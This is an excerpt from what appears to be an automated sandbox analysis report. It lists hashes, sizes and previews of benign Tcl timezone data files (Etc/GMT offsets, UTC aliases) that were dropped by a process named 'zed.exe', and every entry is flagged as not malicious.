                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDONeyFNMXGm2OHrXVYVny:SlSWB9eg/yRSNPDm2OHriVy
                                                                                                                                                                                                                                            MD5:F92B31548D6BF8CCFA326C0CA6E205A0
                                                                                                                                                                                                                                            SHA1:3FFC6C214EDBCBE9C2509306CE73B429113E1C8A
                                                                                                                                                                                                                                            SHA-256:6BA5779E35D581B409F53B14B6E28ECC16F536FFEDD45DDBC8DAE4B8C28F66E7
                                                                                                                                                                                                                                            SHA-512:317872E986099D02AF083397AE936854043D54CEBF45A70672F02DDC9E2F3B27BC3FA80902F9675131C51A09BBD3C2BD1CD437330935CEA113C643769E0DF20C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+7) {.. {-9223372036854775808 -25200 0 -07}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.915798027862021
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOOF3vXMXGm2OHmFvGpn:SlSWB9eg/yRSqfXDm2OHaOp
                                                                                                                                                                                                                                            MD5:B31B15E6006F8DF0D7627D6C90FF39AF
                                                                                                                                                                                                                                            SHA1:7C4137BE11DA84771DF6DC5EBC32D5E5E87E060F
                                                                                                                                                                                                                                            SHA-256:CA87559B154B165E83482AEE3D753BA8E38ABCA347A005E8504C566433CF4CB3
                                                                                                                                                                                                                                            SHA-512:220F7E7379EABBC8ACD7ADBB7A4AC8E93E4B268F8F1C0965B7E6A09735EE86E293EF1C492990331EEB4176B8301A91EC20579756B962AE45C858A96C09349CCD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+8) {.. {-9223372036854775808 -28800 0 -08}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.95764928386407
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDO3fMXGm2OHNms:SlSWB9eg/yRSPDm2OHNms
                                                                                                                                                                                                                                            MD5:5B10173EB7119F1219250763504A3526
                                                                                                                                                                                                                                            SHA1:A845021437C4638079040EF27AEF163C865FF8F8
                                                                                                                                                                                                                                            SHA-256:A0987A1D078B0993FB3B07208E3F4538A2319DCDDDEB2FAEA32FC463DEAFB8DB
                                                                                                                                                                                                                                            SHA-512:D213285D0A723B7771263122AFA269C2ABD0325A97D32C3870341255C06597DD6851C22860CFF42BF54E3FF5A36FC88C306F3BF1C69E7BD7FD7F69FE7601ED1A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+9) {.. {-9223372036854775808 -32400 0 -09}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):159
                                                                                                                                                                                                                                            Entropy (8bit):4.898210849752128
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/yRDIyHp8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/yRUyJ8RQy
                                                                                                                                                                                                                                            MD5:5AFB7F12BA056619252D48904523DFA9
                                                                                                                                                                                                                                            SHA1:CD6E6681C8302BF38095975DF556BD14959FDAC8
                                                                                                                                                                                                                                            SHA-256:EFF27B3DEE9306641FF344801E06BB33FF768CDCCFE2409FA8AF752FF6D39F66
                                                                                                                                                                                                                                            SHA-512:2869BB347F42667A3D174816466B15916FC61FCB5A6A1BE1DD750C5C1751602FEE0FE5A27651B7A19C9F6764872DD0F00D3D5AA16CA1A743DBA09646D25A4EB2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Etc/GMT-0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):115
                                                                                                                                                                                                                                            Entropy (8bit):4.979902281541545
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDI/fMXGm2OHMKUrn:SlSWB9eg/yRUXDm2OHtUr
                                                                                                                                                                                                                                            MD5:4000096844091488200125FC8F50E2F5
                                                                                                                                                                                                                                            SHA1:9FFEAE66405CFB254180C7DBE185288791DFEE5F
                                                                                                                                                                                                                                            SHA-256:B4BF883FBE9246EF4079179A746B1F9E59F2C77D4F598794B60732D198DC6044
                                                                                                                                                                                                                                            SHA-512:25C69E04018C2978A2E5748F0D3C61157453D998C16FA4B3C257A6515B87F5FD2B754893B47604BBC60AB60B60BA162BF2D1463E616E72CB8713C736F1B4D428
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-1) {.. {-9223372036854775808 3600 0 +01}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.964101313797091
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDINFeyFNMXGm2OHMUUMy:SlSWB9eg/yRUN5XDm2OHXFy
                                                                                                                                                                                                                                            MD5:AE6601FACF6BE1E68083F8D353901181
                                                                                                                                                                                                                                            SHA1:8B3BFA307D2A94BADD3A1A5E42545D6F7C620BCE
                                                                                                                                                                                                                                            SHA-256:EF3046D7789CAE069B5473D053F3EF0157248F8A359A1282EE02BA613A75FC94
                                                                                                                                                                                                                                            SHA-512:1859E6A2CB94EFEE7CD5C17803AA4F2DEEBE4DCF43D3B1EA737DF00BA86ECEC79D296D75E69D5829DECB48380B6B650724104FFA7959FD18FE032DF7D002A88B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-10) {.. {-9223372036854775808 36000 0 +10}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):5.00162575418652
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIVSMXGm2OHlVVtyn:SlSWB9eg/yRUVSDm2OHlVLy
                                                                                                                                                                                                                                            MD5:D864BA451C9E441BF47D233626C57B99
                                                                                                                                                                                                                                            SHA1:6C38E6F8BA292575C496124572D187F97C9F8E73
                                                                                                                                                                                                                                            SHA-256:CCDEADBD18BE81E59A669A460A14AFCBFF733C3A5D164FC2B6B93DEAF009B78A
                                                                                                                                                                                                                                            SHA-512:5C16BD1189F3FE6789CB3630C841FD168EC87D0498EE6FCC4C8D635F8CF4BCAF0558B44F859C37E418F6BC5A7F6693D6EF1DD218A1DB6DA2D54FF55916685119
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-11) {.. {-9223372036854775808 39600 0 +11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.978079707159482
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIjbNMXGm2OHwvv0UIoAov:SlSWB9eg/yRUjJDm2OHwvv0YAov
                                                                                                                                                                                                                                            MD5:C3E7748C7CB9D8A7F7FA5170D5098983
                                                                                                                                                                                                                                            SHA1:54F5374A32173BEC6EDA430745DCD18749ABC233
                                                                                                                                                                                                                                            SHA-256:23B61B18C653E25F7245B0BB6E04AD347E038585B145962FD1EEACE26F118D54
                                                                                                                                                                                                                                            SHA-512:4783A7CD4C94CCC67C1C71F9C5D9CD99A3918EA4792D8CE2443ACE8F034B9023EBC02405B5DEAB919AA35FD1FD29D8980774316AC96D32ECDEBEFA15BBE6878D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-12) {.. {-9223372036854775808 43200 0 +12}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.994320173226919
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIaMXGm2OH1dNv7Dy:SlSWB9eg/yRUaDm2OHty
                                                                                                                                                                                                                                            MD5:224AAAA8A31C283F50149A090E3970D5
                                                                                                                                                                                                                                            SHA1:E7E4876EC2474FEFD82D4B174CA8E3A3427062F5
                                                                                                                                                                                                                                            SHA-256:A9F1AD5A7CB5ED43C5E6E8A7A9B887329890ABB75B9FC9483B8543A367457EBE
                                                                                                                                                                                                                                            SHA-512:6EE0C6F519AAB2DAA3F7D802F0F838BA9F6BF1D56530000D3C9EA4FDA81DCB9832A3285E36208F29EEB23C27EC5BFD3438DC272929A7531268B7C0626A65D6A5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-13) {.. {-9223372036854775808 46800 0 +13}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.9895752453470585
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIxhfMXGm2OH0FVtXvFv:SlSWB9eg/yRUxJDm2OH8jNv
                                                                                                                                                                                                                                            MD5:8ADF71739DCADE63433B7BF8321EAC77
                                                                                                                                                                                                                                            SHA1:AA6BDE83FF0D8BCFDE0426160250F2D17D3AF81D
                                                                                                                                                                                                                                            SHA-256:A37A7160027BD38356764C4D1AA5B9B17F8D5DC3CFB81EF2ED399E44C41734CE
                                                                                                                                                                                                                                            SHA-512:AEE3929DE269ADB5265A54841F041E41595359C101539F6309A4E737E3F5DF0BC91560781C7118975398C29A084113682C78F66E07E2E4AC5EAC8DFC33C4F0ED
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-14) {.. {-9223372036854775808 50400 0 +14}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):115
                                                                                                                                                                                                                                            Entropy (8bit):4.921164129348819
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDInWNMXGm2OH/VXF9:SlSWB9eg/yRUnSDm2OH/Vb
                                                                                                                                                                                                                                            MD5:CABB864F4E76B90928F5C54CD9334DEB
                                                                                                                                                                                                                                            SHA1:4818D47F83F16B9F7612D1E979B2440C170ECDB9
                                                                                                                                                                                                                                            SHA-256:7211BF8329B2388563ED8FA8C5140099A171B8A303A9473E9A6F3AF0C5D239CB
                                                                                                                                                                                                                                            SHA-512:1FDCB05D675F1D28CB52B9F5EAC7EC52FDF2CE7E7411740A6F8FB5E9D443ED636CE268E3AF9E08605CC3E13A49B2D86FF4EA6A85F518D5C79E263BA94263361D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-2) {.. {-9223372036854775808 7200 0 +02}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.948161547682094
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIYyXMXGm2OHkNsWYcv:SlSWB9eg/yRUlDm2OHkKWYe
                                                                                                                                                                                                                                            MD5:4AE5F29A13A86E4A7064E9200668E43B
                                                                                                                                                                                                                                            SHA1:2460BD1BB0FF3A3C774A5C7CC3DA10235DA06B0D
                                                                                                                                                                                                                                            SHA-256:BFC86D65B0B94725DCE4C88EDC4300141ABBCA4B6CDECF037C437DF49F0C1D6A
                                                                                                                                                                                                                                            SHA-512:190DC38B4A20F964C967866507086317D85D979DFCFA415D1569C485C6476024922BC6E7103273C41889D9D7B22E97933F286FCF4D341248077C1BA777D0EE3B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-3) {.. {-9223372036854775808 10800 0 +03}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.970850637731657
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIQXMXGm2OHkVsRYovV:SlSWB9eg/yRUQXDm2OHkSN
                                                                                                                                                                                                                                            MD5:BBAF760E27C02D176A675AC3CF2D1E6D
                                                                                                                                                                                                                                            SHA1:E524FAA7D424A1C1545D1D8EC00169125A68E8E5
                                                                                                                                                                                                                                            SHA-256:02E2EEAF88EE179EF63DD29ACC7384A4B46DE1E3A151C1F3A5DD31BBB5A05AEE
                                                                                                                                                                                                                                            SHA-512:6AC7CC0E52E7793C7F2D3DDA9551709DEAE654C1182EAD7108D04F1BAAAB7E1C473B6E8A3A126B0E421D8A246294A03B2EE9E070330924502DF2869CC61C37F7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-4) {.. {-9223372036854775808 14400 0 +04}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.955530107787899
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDI7tNMXGm2OHM0VQVFv:SlSWB9eg/yRU7PDm2OHnVQVV
                                                                                                                                                                                                                                            MD5:17F64A5969D3755211E60C0A9F83974F
                                                                                                                                                                                                                                            SHA1:FEFA84725EFAE6405F43797296C342B974F2D272
                                                                                                                                                                                                                                            SHA-256:3A2C75DCA11D1167126F0D44A8682420FAF75B0B82B3DCFC35A9F028A9A759E8
                                                                                                                                                                                                                                            SHA-512:77DBCD8284A470E4869976E2E8A5EDE28104283F120C863785A6B2E64CF87E06243196817C0055A9B32D6FFFE94A25772F67D58BF8E885F7EC06C34FABE38766
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-5) {.. {-9223372036854775808 18000 0 +05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.973993120288556
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIg3fMXGm2OHETNSTVVn:SlSWB9eg/yRUgPDm2OHETMX
                                                                                                                                                                                                                                            MD5:51CAF7956E133C8A9788AE0B8C6145AB
                                                                                                                                                                                                                                            SHA1:47F8B49DF9ED477BD95F908693A483AE4FDE881F
                                                                                                                                                                                                                                            SHA-256:D22C87321373EC0EFB0F312925476CD0747323EF303E17621A871BF814C8ABB1
                                                                                                                                                                                                                                            SHA-512:EC4B4BE74C1BA64DEC8EF11DAAA338C52BD67D55E8A2352FBC6C83FA142F8DBE424CC1110E9A9D9A891E1E858D1FFA6D1E3B997D41BBB374556FA1F9A708559E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-6) {.. {-9223372036854775808 21600 0 +06}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.928999319005163
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIpdNMXGm2OHAXUVSYovV:SlSWB9eg/yRURDm2OHAXUVSYyV
                                                                                                                                                                                                                                            MD5:56D88B54CA33B43E2E7D3EA6AD3A4D6E
                                                                                                                                                                                                                                            SHA1:9351E0C001C5D83325281AF54363D76D65548B7D
                                                                                                                                                                                                                                            SHA-256:70CB3A766A2E84148B68613D68687D263D3592ED4B6E672797FB20801ECA8231
                                                                                                                                                                                                                                            SHA-512:32B58AD16F64590903C7AB49BA4890DAF6F1F3D33187A7654D3DA88A1C0047483EAA58B2498D824A30116E235FCC8F8FB3FADD57F86396240E5D92B2CA337027
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-7) {.. {-9223372036854775808 25200 0 +07}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.9145396982864895
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIlSMXGm2OHN/VsdYLyn:SlSWB9eg/yRUlSDm2OHUp
                                                                                                                                                                                                                                            MD5:E462AD5E0C046EA6769EDB4B2C80F4D4
                                                                                                                                                                                                                                            SHA1:6DDB94485648622875E0927BA1E8CFE67CEC1382
                                                                                                                                                                                                                                            SHA-256:80C85D59416CEC91DB3DAC5FDD2FD7B91D6FC74A37BBBEF6FF58F6F6816E8FC9
                                                                                                                                                                                                                                            SHA-512:42734FD2DA8BD6E0BC271FF1375A31DEB72EED85AB5EA6E1E0F81EE4E3E7E74380FFC98FAC30409684F736DB580AAAF4F62DB4757AA35C10383584F6144EF363
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-8) {.. {-9223372036854775808 28800 0 +08}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.956751740978211
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIeyXMXGm2OHENScFAy:SlSWB9eg/yRUPDm2OHsScr
                                                                                                                                                                                                                                            MD5:98F70EC1B1AC7D38CB8D01705FB0CA56
                                                                                                                                                                                                                                            SHA1:EDAFA132E48935ACEB8E72D3FF463E4FC857C1A9
                                                                                                                                                                                                                                            SHA-256:57395BB968AFA5A041EADA4B684B82F0379A9333F9522D69F069A79FDEA2B8D7
                                                                                                                                                                                                                                            SHA-512:97B8D7603D6B54C075B005B905B2A7A28B8BEA67894F055663C44D2BF730BB937AC8EF5B2DF182BDD2D9EFFDBD135DF9467C813AEE39AA6B34256908A12DC011
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-9) {.. {-9223372036854775808 32400 0 +09}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):158
                                                                                                                                                                                                                                            Entropy (8bit):4.886484135647838
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/yRDVMFHp8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/yRC1p8RQy
                                                                                                                                                                                                                                            MD5:F879FB24EA976394B8F4FAF1A9BF268C
                                                                                                                                                                                                                                            SHA1:903714237EBD395A27EAF00B3DAAA89131267EE5
                                                                                                                                                                                                                                            SHA-256:AB742F93BE44BD68AB8FE84505FA28120F1808765D9BAED32A3490AF7C83D35B
                                                                                                                                                                                                                                            SHA-512:F5EE4C331E37036516F2A1BF12F2E088B2E2C7F6475127BF4E7B4937F864550D64D570BC855B6058D4311755E8696EC42095A36AEF13BB29E62192EE0AFB6EAF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Etc/GMT0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):163
                                                                                                                                                                                                                                            Entropy (8bit):4.911342539638601
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/yRp+FB5yRDMovn:SlSWB9vsM3yFXHAIgnvVHN/yRp6BURQy
                                                                                                                                                                                                                                            MD5:CDD2DE9CF0FECFEA0CDD32DAC32DCDE2
                                                                                                                                                                                                                                            SHA1:311CD4C6E819E18BAAACC382F81359BC208E2F73
                                                                                                                                                                                                                                            SHA-256:F89167B6117838D9679C0397496B6D96D3A7BEAEF0BD99406ABACDBDB658FBCC
                                                                                                                                                                                                                                            SHA-512:1AF061D07D2F579A089905B6B259AABD7C58F4FA0CD379EE54206164F0DCAEA5C720FB1F5E76F5782F8613E62D8F83BD55F1848D5D7A73D4A5C9F7BC6B9F5DB1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Etc/Greenwich) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):157
                                                                                                                                                                                                                                            Entropy (8bit):4.838936002050477
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/yRKh8RFB:SlSWB9vsM3yzTHAIgm6N/yR68RX
                                                                                                                                                                                                                                            MD5:0587EB7D1B1C684A4A0F90D3CB0959C8
                                                                                                                                                                                                                                            SHA1:3F2840AE512774494D9A0B6357C52CCB7DBA5265
                                                                                                                                                                                                                                            SHA-256:0856D14DBBC53D46460BCD530BD070E9E8966D1C96BA01BA556E215A98C09CD4
                                                                                                                                                                                                                                            SHA-512:DE38EF28893853219AC24AE4A522307ADAA1502F6D0C129219FAD9D75CFCE03A505C3E0758CFF2D2D4F7101414A5F7E4FC1C1B119B667E6A9C89B60DDA641E86
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Etc/UCT) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):110
                                                                                                                                                                                                                                            Entropy (8bit):4.903699772785336
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRF3yFNMXGm2OHvL:SlSWB9eg/yR9SDm2OHj
                                                                                                                                                                                                                                            MD5:3D3F94B6AC5FA232E509356C703D9177
                                                                                                                                                                                                                                            SHA1:502B8EE9D4A1EA75A91272181AC87B9B6ECE1F84
                                                                                                                                                                                                                                            SHA-256:4D74D9EC2397B1708FEF47806294B0BCA26679F3A63149AE24E4E0C641976970
                                                                                                                                                                                                                                            SHA-512:205A761A01C577F602236CB5C9938C834B7F3F9F681B94036B0A86101119893EF87D206D0C3F7737075ED833D4E35E374ACAE6605163E9C37B705D99BEBC928C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/UTC) {.. {-9223372036854775808 0 0 UTC}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):163
                                                                                                                                                                                                                                            Entropy (8bit):4.874807282103623
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/yRYzXDJMFfh8RFB:SlSWB9vsM3yzTHAIgm6N/yRY7VMr8RX
                                                                                                                                                                                                                                            MD5:65E28EFF342B625E79175793FD38F9FD
                                                                                                                                                                                                                                            SHA1:08B11474822E670DEAB8F0EA168BAED7D5E3DBE1
                                                                                                                                                                                                                                            SHA-256:A2B62C5914DE169A68A018A5B47C1253DBCA10A251862D17B0781ECFD19B6192
                                                                                                                                                                                                                                            SHA-512:79641D0E05F81BFB80034937D34E74B7483A790F33C1F9A0FA92C6A7913AC8C03036CFDEFB43850B84EFB3DD3C4A39022DC8F22E5B5DE6353586A546E03A5789
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Etc/Universal) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):158
                                                                                                                                                                                                                                            Entropy (8bit):4.874356623237119
                                                                                                                                                                                                                                            Encrypted:false
